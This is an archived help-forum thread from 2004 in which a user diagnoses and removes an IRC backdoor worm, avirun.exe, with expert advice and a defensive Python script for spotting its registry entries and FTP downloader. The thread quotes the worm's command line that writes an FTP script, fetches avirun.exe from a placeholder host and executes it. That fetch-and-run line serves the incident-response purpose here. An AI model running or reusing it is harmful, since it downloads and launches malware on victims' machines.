unknown virus / backdoor trojan for IRC

Posted on 2004-11-04
Last Modified: 2013-12-04
I have discovered a virus/backdoor trojan which I cannot find a resolution for. I have pieces of the virus, but not the entire puzzle to clean the infected machines. I have searched Google, Symantec, etc. for the process name (avirun.exe) but it was prob mutated. Here is what I have:

On Windows 2000 and XP boxes I found a process that runs called avirun.exe. When it runs it makes the computer unable to accept connections, mainly because the virus is opening the box to an IRC channel. I have to reboot in order to delete the avirun.exe, but first I have to delete all the "MSConfig" = "avirun.exe" out of the registry keys (and there are quite a few). However, this process comes back. I then found a file, named simply "o", which is displayed below. It looks as if this file FTPs the avirun.exe from another infected machine. Even if I delete all the entries, the avirun.exe and the o file, it still comes back, making me think that it spreads via a Windows exploit. I could not find any file (I checked recently modified files) that is a batch that would call the o file to download the .exe, or any other executables in the regedit Run's. It looks like the Backdoor.Hacarmy.E trojan, except that it keeps coming back.

Has anyone seen this? If so, is there a removal tool? I think if you fully patch the OS and delete all parts, it will stay away, but I need to be able to get rid of it on unpatched systems to stop the spread.

FYI, a full Symantec scan via the Internet or the newest defs comes up clean.

o file:

open [ip address] [port]
user 1 1
get avirun.exe
Question by:xxgenius
    LVL 17

    Expert Comment

    Hi xxgenius,

    It sounds very interesting. The behaviour is that of a trojan. First thing I'd do is to download ProcessExplorer and run it. Look for the avirun and the o processes. In ProcessExplorer, double-clicking on a process will bring up a wealth of info, including Registry keys and the IP number to which the process is connecting. If you have a Firewall, you can create a rule to block access to that IP and then use KillBox to kill the offending files, but especially the o file, which is the monitor/downloader. Then you can use the info gathered from ProcessExplorer to clean up your Registry.

    You can download ProcessExplorer and KillBox from:

    By the way, before deleting these files I'd make a Zip file with them and send it to the guys at McAfee and Symantec for research.

    Good Vibes!

    LVL 8

    Author Comment

    These have been sent to Symantec and Sybari (which then disperses them to other engines). According to Symantec, their latest Rapid Response would catch it (haven't tried it yet). I can say that your Windows must be patched and then you can delete the files. Here is what the avirun.exe does when executed:

    echo open [IPaddress Port] > o&echo user 1 1 >> o &echo get avirun.exe >> o &echo quit >> o &ftp -n -s:o &avirun.exe
    LVL 8

    Author Comment

    Symantec definitions 11/5/04 Rev 5 will detect it as W32.Spybot.worm.

    To rid your machine: fully patch with Windows and reboot. Then run antivirus and delete the files it finds. Delete the "o" file. Open regedit, search for all strings for the process and delete.
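    As an added triage helper (not code from the thread or from any of the posters), the script below checks an exported .reg text for the Run/RunServices values the asker describes ("MSConfig" = "avirun.exe") and parses an ftp -s: script of the same shape as the o file to report where the download points. The registry export, IP address and port are constructed samples, not values from the thread.

```python
import re

# Constructed sample of a registry export (.reg text); not from the thread.
# Two Run-type keys carry the "MSConfig"="avirun.exe" value the asker saw.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSConfig"="avirun.exe"
"Synchronization Manager"="mobsync.exe /logon"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
"MSConfig"="avirun.exe"
'''

# Constructed copy of the "o" script; host and port are placeholder values.
SAMPLE_O = "open 192.0.2.10 6667\nuser 1 1\nget avirun.exe\nquit\n"

# Matches the autostart keys the thread tells you to search in regedit.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Services|Once)?\]$", re.IGNORECASE)
VALUE = re.compile(r'^"([^"]*)"="(.*)"$')


def find_run_entries(reg_text, needle="avirun.exe"):
    """Return (key, value_name, data) for Run-type values whose data mentions needle."""
    hits, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # Only remember the section if it is an autostart key.
            key = line[1:-1] if RUN_KEY.search(line) else None
            continue
        m = VALUE.match(line)
        if key and m and needle.lower() in m.group(2).lower():
            hits.append((key, m.group(1), m.group(2)))
    return hits


def parse_ftp_script(text):
    """Extract host, port, user and fetched files from an 'ftp -n -s:' script."""
    info = {"host": None, "port": 21, "user": None, "files": []}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            if len(parts) > 2 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif cmd == "user" and len(parts) >= 2:
            info["user"] = parts[1]
        elif cmd in ("get", "mget") and len(parts) >= 2:
            info["files"].extend(parts[1:])  # what the downloader pulls in
    return info
```

    The reported host and port are the source of the copy being fetched, which is the address a firewall rule would block while the Run entries are cleaned.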
    LVL 1

    Accepted Solution

    PAQd, 250 points refunded - asker posted solution

    Community Support Moderator